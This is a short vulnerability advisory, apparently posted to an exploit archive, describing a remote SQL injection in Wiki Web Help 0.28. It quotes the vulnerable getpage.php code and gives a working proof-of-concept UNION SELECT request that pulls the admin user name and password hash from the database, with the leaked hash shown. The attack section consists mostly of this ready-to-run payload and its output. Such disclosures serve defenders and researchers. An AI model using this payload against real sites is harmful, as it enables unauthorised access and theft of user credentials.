what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Wiki Web Help 0.28 SQL Injection

Wiki Web Help 0.28 SQL Injection
Posted Jul 6, 2010
Authored by ADEO Security

Wiki Web Help version 0.28 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, web, sql injection
SHA-256 | f50a808a514db936aad169cb76e09732e523222bc458638481d751b9c5564470

Wiki Web Help 0.28 SQL Injection

Change Mirror Download
# Version: v0.28 (Possible all versions)
# Vendor: Richard Bondi - http://wikiwebhelp.org
# Download: http://wikiwebhelp.org/release/wwh-0.2.8.zip

# Description: "The goal of this project is to create a help
application that is editable by the community. Standard wiki systems
are great for many applications. The help application and the wiki is
an ideal marriage. The problem with the standard wiki in a help
application is that it leaves you jumping around and does not have the
smooth flow that we have with a desktop chm type viewer. This project
aims to return that smooth flow to your wiki based help application."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr

# Vulnerability:
In the file named as getpage.php user input don't used in single quotes.

handlers/getpage.php
---[snip]---
4 if($page==null) $page = $_GET['id'];

5

6 $sql = "SELECT * FROM page INNER JOIN node ON
node.node_id=page.node_id WHERE node.node_id=$page";
---[snip]---

Its successfully exploitable. Please see # PoC section.

# PoC:
Request: http://server/handlers/getpage.php?id=9999999+UNION+SELECT+1,CONCAT_WS(0x3a,user_name,password),3,4,5,6,7+FROM+user+LIMIT+1

Response: admin:21232f297a57a5a743894a0e4a801fc3

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close